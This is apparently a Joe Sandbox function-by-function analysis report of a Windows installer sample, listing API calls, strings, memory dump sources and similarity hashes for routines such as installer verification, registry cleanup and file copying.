Function 0040324C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON

Download Yara Rule

APIs

SetTimer.USER32(?,00000001,000000FA,00000000), ref: 0040326A
MulDiv.KERNEL32(00016E00,00000064,000EECB3), ref: 00403295
wsprintfW.USER32 ref: 004032A5
SetWindowTextW.USER32(?,?), ref: 004032B5
SetDlgItemTextW.USER32(?,00000406,?), ref: 004032C7

Strings

verifying installer: %d%%, xrefs: 0040329F

Memory Dump Source

Source File: 00000000.00000002.1692748467.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1692728633.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692777079.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692916425.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_lem.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: verifying installer: %d%%
API String ID: 1451636040-82062127
Opcode ID: 3861699fe6b90eb98aefdbb76a6aac10e2c6ef9ed100297db3f2db1cf1739afe
Instruction ID: b5f4dff99bd495ec87a9693a0662ffae913500554fa258d9a040327637eece45
Opcode Fuzzy Hash: 3861699fe6b90eb98aefdbb76a6aac10e2c6ef9ed100297db3f2db1cf1739afe
Instruction Fuzzy Hash: F8014470640109BBEF109F60DC4AFEE3B68AB00309F008439FA05E51E1DB789A55CF58

Function 00406064 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71COMMON

Download Yara Rule

APIs

CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
CharNextW.USER32(?,?,?,00000000), ref: 004060D6
CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF

Strings

*?|<>/":, xrefs: 004060B6

Memory Dump Source

Source File: 00000000.00000002.1692748467.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1692728633.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692777079.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692916425.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_lem.jbxd

Similarity

API ID: Char$Next$Prev
String ID: *?|<>/":
API String ID: 589700163-165019052
Opcode ID: 45da571b5baffeb551c3f596f843ba1ccba930a874212f5238eaf5e1151c3a30
Instruction ID: be175804d259169a812840791ea7ca7df426672d81dd27f3292f2fdf866f60ab
Opcode Fuzzy Hash: 45da571b5baffeb551c3f596f843ba1ccba930a874212f5238eaf5e1151c3a30
Instruction Fuzzy Hash: E311C81188022159DB30FB698C4497776F8AE55750716843FE9CAF32C1E7BCDC9182BD

Function 0040149D Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004014BF
RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 004014FB
RegCloseKey.ADVAPI32(?), ref: 00401504
RegCloseKey.ADVAPI32(?), ref: 00401529
RegDeleteKeyW.ADVAPI32(?,?), ref: 00401547

Memory Dump Source

Source File: 00000000.00000002.1692748467.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1692728633.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692777079.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692916425.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_lem.jbxd

Similarity

API ID: Close$DeleteEnumOpen
String ID:
API String ID: 1912718029-0
Opcode ID: 2a270dabeadf4e4f1a4763114e85c5fdf2352e77b68d80cc92c62b7e226f3bc1
Instruction ID: c67b0bc93acae55c3864b02ebd95f02f7c15995ce12be8144693d1f813214158
Opcode Fuzzy Hash: 2a270dabeadf4e4f1a4763114e85c5fdf2352e77b68d80cc92c62b7e226f3bc1
Instruction Fuzzy Hash: EB117976500008FFDF119F90ED859AA3B7AFB84348F004476FA0AB5070D3358E509A29

Function 0040209F Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?), ref: 004020A3
GetClientRect.USER32(00000000,?), ref: 004020B0
LoadImageW.USER32(?,00000000,?,?,?,?), ref: 004020D1
SendMessageW.USER32(00000000,00000172,?,00000000), ref: 004020DF
DeleteObject.GDI32(00000000), ref: 004020EE

Memory Dump Source

Source File: 00000000.00000002.1692748467.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1692728633.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692777079.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692916425.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_lem.jbxd

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: 06a5835b44d3b6ac96e348dee9128c473dfe3a95b4f6450d10307ae5d6bb1818
Instruction ID: 8f71947f799b2f64a69df86d2a8dcb393400c967cd863db52f2ee5b4f8782dab
Opcode Fuzzy Hash: 06a5835b44d3b6ac96e348dee9128c473dfe3a95b4f6450d10307ae5d6bb1818
Instruction Fuzzy Hash: 9DF012B2A00104BFE700EBA4EE89DEFBBBCEB04305B104575F502F6162C6759E418B28

Function 00401F80 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401FE6
SendMessageW.USER32(00000000,00000000,?,?), ref: 00401FFE

Strings

!, xrefs: 00401FB6

Memory Dump Source

Source File: 00000000.00000002.1692748467.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1692728633.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692777079.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692916425.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_lem.jbxd

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: e47ff439633ded3fb17ec5eecd0e1b6806a5c9fa211e2190a11df636c871b995
Instruction ID: 6a5c1514d43e21eed083d94b15ba6593763dc9af2b3e6337d8774d5f4809249f
Opcode Fuzzy Hash: e47ff439633ded3fb17ec5eecd0e1b6806a5c9fa211e2190a11df636c871b995
Instruction Fuzzy Hash: 56217171900209BADF15AFB4D886ABE7BB9EF04349F10413EF602F60E2D6794A40D758

Function 004043D9 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 73stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(00451D98,%u.%u%s%s,?,00000000,00000000,?,FFFFFFDC,00000000,?,000000DF,00451D98,?), ref: 00404476
wsprintfW.USER32 ref: 00404483
SetDlgItemTextW.USER32(?,00451D98,000000DF), ref: 00404496

Strings

%u.%u%s%s, xrefs: 00404470

Memory Dump Source

Source File: 00000000.00000002.1692748467.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1692728633.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692777079.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692916425.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_lem.jbxd

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s
API String ID: 3540041739-3551169577
Opcode ID: a810ffe09f2dc908503b2f58e47bd406bb4654f19e43ddd30bdf0acdc5011288
Instruction ID: 019992b557dc20c415266b5889428492ee6a52d86c3b4952972254649920ef77
Opcode Fuzzy Hash: a810ffe09f2dc908503b2f58e47bd406bb4654f19e43ddd30bdf0acdc5011288
Instruction Fuzzy Hash: DC11527270021477CF10AA699D45F9E765EEBC5334F10423BF519F31E1D6388A158259

Function 004027E3 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 60registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00401553: RegOpenKeyExW.ADVAPI32(?,00000000,00000022,00000000,?,?), ref: 0040158B

RegCloseKey.ADVAPI32(00000000), ref: 0040282E
RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040280E

Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3

Strings

DeleteRegValue: "%s\%s" "%s", xrefs: 00402820
DeleteRegKey: "%s\%s", xrefs: 00402843

Memory Dump Source

Source File: 00000000.00000002.1692748467.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1692728633.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692777079.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692916425.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_lem.jbxd

Similarity

API ID: CloseDeleteOpenValuelstrlenwvsprintf
String ID: DeleteRegKey: "%s\%s"$DeleteRegValue: "%s\%s" "%s"
API String ID: 1697273262-1764544995
Opcode ID: 1c7787f783619d22a727722e8428d119ca1e8f511c7c384e8364c1fbbf216132
Instruction ID: 70287f52249eeba914cab3bee2f8f529b2cd5257afac1a85b0186071c419a2a5
Opcode Fuzzy Hash: 1c7787f783619d22a727722e8428d119ca1e8f511c7c384e8364c1fbbf216132
Instruction Fuzzy Hash: 2511E732E00200ABDB10FFA5DD4AABE3A64EF40354F10403FF50AB61D2D6798E50C6AD

Function 00402665 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 56stringCOMMON

Download Yara Rule

APIs

Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3

Part of subcall function 00406301: FindFirstFileW.KERNELBASE(00461E18,00466A20,00461E18,004067FA,00461E18), ref: 0040630C
Part of subcall function 00406301: FindClose.KERNEL32(00000000), ref: 00406318

lstrlenW.KERNEL32 ref: 004026B4
lstrlenW.KERNEL32(00000000), ref: 004026C1
SHFileOperationW.SHELL32(?,?,?,00000000), ref: 004026EC

Strings

CopyFiles "%s"->"%s", xrefs: 0040267F

Memory Dump Source

Source File: 00000000.00000002.1692748467.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1692728633.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692777079.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692916425.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_lem.jbxd

Similarity

API ID: lstrlen$FileFind$CloseFirstOperationwvsprintf
String ID: CopyFiles "%s"->"%s"
API String ID: 2577523808-3778932970
Opcode ID: 0c98d155eaf4bf30867e20e2ef9323f8e108a065a1149d83459e1735f252947f
Instruction ID: 7c1d43f40acf3f33c375e3424532232737b5c7d4dc38a4161669d523a66d0fcf
Opcode Fuzzy Hash: 0c98d155eaf4bf30867e20e2ef9323f8e108a065a1149d83459e1735f252947f
Instruction Fuzzy Hash: 8A114F71D00214AADB10FFF6984699FBBBCAF44354B10843BA502F72D2E67989418759

Function 00406250 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 53stringCOMMON

Download Yara Rule

APIs

wsprintfW.USER32 ref: 004062A4
lstrcatW.KERNEL32(00000000,...), ref: 004062C7

Strings

%02x%c, xrefs: 0040629C
..., xrefs: 004062BF

Memory Dump Source

Source File: 00000000.00000002.1692748467.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1692728633.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692777079.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692916425.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_lem.jbxd

Similarity

API ID: lstrcatwsprintf
String ID: %02x%c$...
API String ID: 3065427908-1057055748
Opcode ID: e028bc25539a6ddd5d675d42839d030ce8218c39fe920002d96002040e934ce0
Instruction ID: 9bf571533c0fd83e5fe1ff618cfd19ea7d9613251e6e948213dceada22d50e27
Opcode Fuzzy Hash: e028bc25539a6ddd5d675d42839d030ce8218c39fe920002d96002040e934ce0
Instruction Fuzzy Hash: E201D272510219BFCB01DF98CC44A9EBBB9EF84714F20817AF806F3280D2799EA48794

Function 00405073 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 41comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 00405083

Part of subcall function 00403DDB: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED

OleUninitialize.OLE32(00000404,00000000), ref: 004050D1

Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3

Strings

Skipping section: "%s", xrefs: 004050E1
Section: "%s", xrefs: 004050A5

Memory Dump Source

Source File: 00000000.00000002.1692748467.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1692728633.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692777079.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692916425.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_lem.jbxd

Similarity

API ID: InitializeMessageSendUninitializelstrlenwvsprintf
String ID: Section: "%s"$Skipping section: "%s"
API String ID: 2266616436-4211696005
Opcode ID: 08831c163c79f6045eee3939d78ed76b32885a7039adc7eb93c092c170fa4538
Instruction ID: 3a4ae3dd184d198318ece42e1af7a5bc75ccdc2bd7a030bb5b2a43e0dda7b67b
Opcode Fuzzy Hash: 08831c163c79f6045eee3939d78ed76b32885a7039adc7eb93c092c170fa4538
Instruction Fuzzy Hash: 0EF0F433504300ABE7106766AC02B1A7BA0EF84724F25017FFA09721E2DB7928418EAD

Function 004020F9 Relevance: 6.0, APIs: 4, Instructions: 45COMMON

Download Yara Rule

APIs

GetDC.USER32(?), ref: 00402100
GetDeviceCaps.GDI32(00000000), ref: 00402107
MulDiv.KERNEL32(00000000,00000000), ref: 00402117

Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00424579,74DF23A0,00000000), ref: 00406902

CreateFontIndirectW.GDI32(00420110), ref: 0040216A

Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A

Memory Dump Source

Source File: 00000000.00000002.1692748467.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1692728633.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692777079.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692916425.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_lem.jbxd

Similarity

API ID: CapsCreateDeviceFontIndirectVersionwsprintf
String ID:
API String ID: 1599320355-0
Opcode ID: 5e7bfe574d04e9302ce96a75028483347f8e754cab2f6e4722de83d8c32547a7
Instruction ID: 0ba792ce9c48b24537a9dfec97a4105c0a721b5be590283e64661935fd66df2d
Opcode Fuzzy Hash: 5e7bfe574d04e9302ce96a75028483347f8e754cab2f6e4722de83d8c32547a7
Instruction Fuzzy Hash: B6018872B042509FF7119BB4BC4ABAA7BE4A715315F504436F141F61E3CA7D4411C72D

Function 00407224 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 43stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00406EFE: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406F22

lstrcpynW.KERNEL32(?,?,00000009), ref: 00407265
lstrcmpW.KERNEL32(?,Version ), ref: 00407276
lstrcpynW.KERNEL32(?,?,?), ref: 0040728D

Strings

Version , xrefs: 0040726D

Memory Dump Source

Source File: 00000000.00000002.1692748467.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1692728633.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692777079.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692916425.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_lem.jbxd

Similarity

API ID: lstrcpyn$CreateFilelstrcmp
String ID: Version
API String ID: 512980652-315105994
Opcode ID: e08784de301d9fe6ca80962c3bdf8726d1c794b972164068317a4e691a2db981
Instruction ID: f6016284c167eb8c93e4c4d2cd91337f160ffdcdaea293fd9af5b6974d265005
Opcode Fuzzy Hash: e08784de301d9fe6ca80962c3bdf8726d1c794b972164068317a4e691a2db981
Instruction Fuzzy Hash: 74F08172A0021CBBDF109BA5DD45EEA777CAB44700F000076F600F6191E2B5AE148BA1

Function 004032D2 Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000,00000000,0040372F,00000001,?,?,?,00000000,00403A73,?), ref: 004032E5
GetTickCount.KERNEL32 ref: 00403303
CreateDialogParamW.USER32(0000006F,00000000,0040324C,00000000), ref: 00403320
ShowWindow.USER32(00000000,00000005,?,?,?,00000000,00403A73,?), ref: 0040332E

Memory Dump Source

Source File: 00000000.00000002.1692748467.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1692728633.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692777079.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692916425.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_lem.jbxd

Similarity

API ID: Window$CountCreateDestroyDialogParamShowTick
String ID:
API String ID: 2102729457-0
Opcode ID: 20fc2252fa4e8cade60f22cfb8dff2eb59aca0eba7377cdae62c8c9885b14618
Instruction ID: 7080548a0c715e844c944b711630a30770084a0de0adb1936a850f0acfbe0ad2
Opcode Fuzzy Hash: 20fc2252fa4e8cade60f22cfb8dff2eb59aca0eba7377cdae62c8c9885b14618
Instruction Fuzzy Hash: 76F05E30541220BBC620AF24FD89AAF7F68B705B1274008BAF405B11A6C7384D92CFDC

Function 00406391 Relevance: 6.0, APIs: 4, Instructions: 31memorylibraryloaderCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,00002004,00000000,?,?,00402449,?,?,?,00000008,00000001,000000F0), ref: 0040639C
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00002004,00000000,00000000,?,?,00402449,?,?,?,00000008,00000001), ref: 004063B2
GetProcAddress.KERNEL32(?,00000000), ref: 004063C1
GlobalFree.KERNEL32(00000000), ref: 004063CA

Memory Dump Source

Source File: 00000000.00000002.1692748467.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1692728633.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692777079.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692916425.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_lem.jbxd

Similarity

API ID: Global$AddressAllocByteCharFreeMultiProcWide
String ID:
API String ID: 2883127279-0
Opcode ID: cfe0beae58ad61bea83a9ac8add919dc7b7c61ebe1ef4fe2e37f024ea1666988
Instruction ID: 23858f5f5f858bd20c6f81bae205610dc5c3869b82bfcacec746ad73dc06cfd6
Opcode Fuzzy Hash: cfe0beae58ad61bea83a9ac8add919dc7b7c61ebe1ef4fe2e37f024ea1666988
Instruction Fuzzy Hash: 82E092313001117BF2101B269D8CD677EACDBCA7B2B05013AF645E11E1C6308C10C674

Function 004048F8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 0040492E
CallWindowProcW.USER32(?,00000200,?,?), ref: 0040499C

Part of subcall function 00403DDB: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED

Strings

, xrefs: 00404906

Memory Dump Source

Source File: 00000000.00000002.1692748467.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1692728633.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692777079.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692916425.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_lem.jbxd

Similarity

API ID: Window$CallMessageProcSendVisible
String ID:
API String ID: 3748168415-3916222277
Opcode ID: c170883d227fca0112a12e156e2c8e9ea80fa6a38e1ecce58c6b14ca94f7736c
Instruction ID: 3c1fd1ddb59456d7d2ea24cd553691e7f5dd8d926ac1a383129e0726a186868e
Opcode Fuzzy Hash: c170883d227fca0112a12e156e2c8e9ea80fa6a38e1ecce58c6b14ca94f7736c
Instruction Fuzzy Hash: CE118FF1500209ABDF115F65DC44EAB776CAF84365F00803BFA04761A2C37D8D919FA9

Function 00402797 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25stringCOMMON

Download Yara Rule

APIs

GetPrivateProfileStringW.KERNEL32(00000000,00000000,?,?,00002003,00000000), ref: 004027CD
lstrcmpW.KERNEL32(?,?,?,00002003,00000000,000000DD,00000012,00000001), ref: 004027D8

Strings

!N~, xrefs: 00402797

Memory Dump Source

